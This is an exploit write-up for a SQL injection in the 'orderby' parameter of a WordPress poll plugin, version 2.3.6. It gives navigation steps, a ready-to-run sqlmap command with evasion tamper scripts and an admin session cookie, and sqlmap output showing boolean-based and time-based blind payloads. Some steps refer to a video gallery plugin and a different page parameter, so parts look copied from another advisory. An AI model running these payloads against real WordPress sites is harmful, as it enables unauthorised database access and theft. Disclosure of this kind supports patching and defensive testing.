# Exploit Title: WordPress Poll Plugin SQL Injection
# Date: 2024-07-06
# Exploit Author: tmrswrr
# Category : Webapps
# Vendor Homepage: https://total-soft.com/wp-poll/
# Version 2.3.6
1. **Access the Admin Panel:**
- Navigate to the admin panel of your WordPress site.
- Go to `TS Poll > `Create Pool ` > ` Use Theme` and save it. > https://localhost/wordpress/wp-admin/admin.php?page=ts-poll-builder&tsp-id=1
```
2. After save it back to TS Video Gallery Click title : https://localhost/wordpress/wp-admin/admin.php?page=ts-poll&orderby=Question_Title&order=desc
3. Search for orderby parameter.
## SQLMAP COMMAND
python3 sqlmap.py -u "https://localhost/wordpress/wp-admin/admin.php?page=ts-poll&orderby=Question_Title&order=desc" \
--batch \
--dbms=mysql \
--thread=10 \
--no-cast \
--random-agent \
-v 3 \
--tamper="between,randomcase,space2comment" \
--level=5 \
--risk=3 \
-p orderby \
--cookie="wordpress_logged_in_d31d6d9d0bfd834c03c5a471886561f0=admin|1720435164|r5jSRyl4XMzcZz3xllDos9veD7hga8U8qFIWPQHv5Kr|e111b736b22043864d0f8ea6da823ca00768a110af4da612c555add1979839d1; wordpress_sec_d31d6d9d0bfd834c03c5a471886561f0=admin|1720435164|r5jSRyl4XMzcZz3xllDos9veD7hga8U8qFIWPQHv5Kr|173622110c7f3812695b26c96ba4905a7c760ac41e37645150dd4869ae884c4b; wordpress_test_cookie=WP Cookie check; wp-settings-time-1=1720266472"
## RESULT
---
Parameter: orderby (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: page=tsvg-admin&orderby=(SELECT (CASE WHEN (1078=1078) THEN 0x54535f56475f5469746c65 ELSE (SELECT 2977 UNION SELECT 8545) END))&order=desc
Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=tsvg-admin&orderby=TS_VG_Title AND (SELECT 6127 FROM (SELECT(SLEEP(5)))mIWx)&order=desc
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
---